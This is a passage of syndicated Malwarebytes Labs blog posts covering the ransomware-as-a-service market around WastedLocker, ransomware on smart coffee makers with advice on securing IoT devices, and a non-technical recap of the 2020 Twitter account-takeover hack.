WastedLocker has already proven itself multiple times over as a dangerous and capable piece of malware. Depending on what Evil Corp wants to do next, they could continue trying to ransom corporate networks or they could set up shop and start selling modified versions of WastedLocker to other cybercriminals. The ransomware-as-a-service scene (yes, you read that right) is very lucrative.


Ransomware-as-a-service is a term used to describe a cybercrime group that develops malware for individual customers to spread. This takes a lot of the overhead out of launching a ransomware attack, because previously an attacker might have needed to develop, steal, or buy their own ransomware, then go about trying to infect people with it. The quality of that ransomware was not guaranteed, and it might not even work.

With more advanced families of ransomware like Cerber and Locky, the value was in the proven effectiveness of the ransomware. The creators of these families only needed to make slight updates and provide individualized modifications to customers (like which email address the victim should contact), who would then go about distributing the malware. Once a ransom payment occurs, the creators of the ransomware get their own cut and the distributors get most of the payment.

However, to avoid being scammed by the criminals selling the ransomware, who may include a backdoor in that ransomware, it comes down to reputation of the malware. Have there been news stories about it? Has it been proven in the wild? Combine those queries with the reputation of the creators and sellers of the service: Do they have good relationships with other criminals? Can they be counted on to come through on their end of the bargain?

It’s like buying something off the DarkNet, you have to put your confidence into the seller that they will deliver the product you are buying and a lot of times that comes in the form of previous customer reviews. If a criminal developing malware was putting backdoors into what they were selling, someone would notice and tell other folks about it. Eventually, the vendor will not be trusted anymore, and nobody will buy their wares.

It’s sort of like a rampant free market, but for ransomware, and totally terrible for businesses and consumers. The product with the most reliability, the strongest reviews, and the best, uh, returns, will likely enjoy the most sales.

The post VideoBytes: Ransomware gets wasted! appeared first on Malwarebytes Labs.


Chaos in a cup: When ransomware creeps into your smart coffee maker

Malware Bytes Security - Thu, 10/01/2020 - 12:56pm

When the fledgling concept of the Internet of Things (IoT) began to excite the world almost a decade ago, perhaps no coffee lover would have imagined, even in jest, adding the coffee machine to the roster of internet-connected devices. True, the simple, utilitarian coffee machine may not be as popular now as it once was, but its continued presence in offices and home kitchens, plus the risks inherent in any IoT device, put it on an equal footing with your smart speaker, smart doorbell or smart light bulb.

Cybersecurity issues surrounding internet-connected coffee machines are further punctuated by the latest news about how Martin Hron, a reverse engineer at Avast, tinkered with his Smarter coffee maker to make it not only beep and spew out hot water but also deprive you of a nice morning brew and display a short ransom note.

Courtesy of Dan Goodin, Ars Technica

Yes, Hron turned his coffee maker into a ransomware machine by directly modifying its firmware.

Your bedlam before breakfast

Simply put, firmware is the software that runs on a device and controls its electronic hardware. It is often shipped without encryption or any other form of protection, which makes it a likely and easy target for malicious hackers and spy agencies.

“My colleagues often hear me say that ‘firmware is a [sic] new software.’ And that software is very often flawed,” writes Hron in a blog post detailing his coffee machine tinkering exploits, “The weakened state of IoT security is due in large part to the fact that, nowadays, it is more convenient and cheap to place a processor inside a device […]. This solution is not only cheap, but has also one important property—it can be updated.”

When it comes to breaking into smart coffee makers to explore vulnerabilities in smart devices, this isn't Hron's first rodeo. He also turned the coffee maker he hacked in June 2019 into a ransomware machine, making it do the things seen in the video above. Beyond that, he demonstrated that smart devices in general can serve as a gateway into private networks, allowing threat actors to do as they please there: snooping on every device on the same network as the coffee machine, intercepting communication between users, downloading sensitive data and uploading malicious software.

Unfortunately, the latter was what happened to one company when ransomware was suddenly introduced in their system via a compromised coffee machine.

Coffee, connectivity, and a ransom note

A Reddit user going by the handle C10H15N1 (they admitted it was a throwaway alias to preserve anonymity) learned first-hand how a small mistake in setting up IoT devices in the workplace can cause panic and potentially massive problems if not dealt with early on.

Three years ago, they recounted in a post, an operator of a local factory control system reported that all four computers running the monitoring software were down and showing an error message, which turned out to be a ransom note. As a programmable logic controller (PLC) expert, C10H15N1 helped the operator work out what was wrong and come up with a solution. What the operator described sounded like a ransomware infection, something that should not have been possible given that the affected computers, still running an outdated Windows XP, were not connected to the internet.

C10H15N1 then instructed the operator to restart the computers and reinstall a fresh image. It worked for a while, then one by one the computers started showing the same error again, leaving C10H15N1 stumped. While they were trying to figure out why the computers kept getting reinfected, the operator went off to get coffee, only to come back empty-handed: the coffee machines were displaying the same error message.

At the end of the day, no human or machine was harmed during the attack. They eventually realized that the malware had used the coffee machines as a foothold to infect other computers on the network. The smart coffee machines were supposed to be on their own isolated Wi-Fi; however, the third-party personnel who installed them had connected them to the control room network with a cable.

C10H15N1's company nevertheless sent a scathing letter to their coffee machine supplier about what happened.

What can you do to protect yourself from troubles your smart coffee machine may cause you?

While it is true that IoT ransomware is no longer a theory but a reality, albeit a rare one, this doesn't mean it's alright for organizations and consumers to keep their guard down. Now that we have a real-world scenario, coupled with multiple feats of security researchers successfully hacking into smart percolators [1][2][3][4][5][6][7], IoT ransomware should be on every enterprise's and private citizen's radar. They should already be thinking of ways to better protect themselves. Let's start with these:

  • Put your smart percolator on its own network segment (a guest Wi-Fi or VLAN), never on the network used by systems that hold sensitive information or where sensitive communication within your organization (or home) takes place.
  • Update your smart percolator's firmware as soon as updates are available.
  • Secure your network. Replace your router's default password with a strong, unique one.

When it comes to whether you should get an IoT device or not, the general rule is to first ask yourself this question: Do I really need my light bulb/coffee pot/washing machine/doorbell/other household items to be smart?

If your answer is “no”, then you should keep using the items and appliances you are using. However, if having an IoT in the home is unavoidable—you really need to replace that broken TV, and no shop is selling the same make and model anymore—then by all means buy that smart TV, and that smart coffee maker, too, while you’re at it. But please make sure that you do everything you can to stay protected. Remember that your supplier has their part to play in the security of things. You have your part, too.

Happy International Coffee Day! Keep that coffee flowing and, as always, stay safe!

The post Chaos in a cup: When ransomware creeps into your smart coffee maker appeared first on Malwarebytes Labs.


VideoBytes: Twitter gets hacked!

Malware Bytes Security - Thu, 10/01/2020 - 12:00pm

Hello dear readers, and welcome to the latest and greatest from VideoBytes: a brand new, video feature that we announced just yesterday.

On our debut post today, we’re talking to you about the Twitter hack, in which hackers accessed the Twitter accounts of 130 high profile figures, like Barack Obama, Joe Biden and Elon Musk by gaining access to an employee administrative panel.

Watch on to learn all about it! Or, as our esteemed host always says: Sit back, relax, here come the facts.

(And a quick note to our readers: For just a couple of days, you may see a YouTube title that doesn’t mention “VideoBytes.” Do not worry, there is nothing wrong with your … er, television set? That’s us, updating our videos as we move along.)

The Attack

The hackers called Twitter employees on the phone and tricked them into handing over their passwords: simple social engineering. By calling a lot of people they eventually obtained a few passwords for accounts with limited access, then worked their way up to accounts with more access, reset the passwords of 45 of the targeted accounts and logged in.

The Damage

According to Twitter, 130 total accounts were targeted, 45 of them had tweets sent by attackers, 36 accounts had their direct messages accessed and a few accounts had their Twitter data archive downloaded. Yikes.

The tweets sent by the attackers using the hijacked accounts all pointed to a bitcoin gathering scam. Each tweet claimed that the user was “giving back” by sending people double the bitcoin they put into a wallet. If that immediately sounds too good to be true, well, it was.

The cryptocurrency wallet set up by the hackers collected about $120,000 worth of bitcoin. It could have been a lot more, but Coinbase, the US-based cryptocurrency exchange, blacklisted the hackers' bitcoin address, preventing almost 1,000 users from sending approximately $280,000 worth of bitcoin to the scammers. Good work.


In response to this attack, Twitter blocked all accounts involved from tweeting for 3 hours while they cleaned it up.

To reduce the chance of it happening again, Twitter admins are also significantly limiting employee access to internal systems during the investigation and improving tools to identify unauthorized access to their internal systems.

Finally, Twitter is rolling out company-wide phishing training.

The administrative tools the hackers gained access to could disable two-factor authentication, so victims had no way of preventing their accounts from being hijacked. It was an unfortunate, but thankfully not devastating, lesson for the social media company.

The post VideoBytes: Twitter gets hacked! appeared first on Malwarebytes Labs.
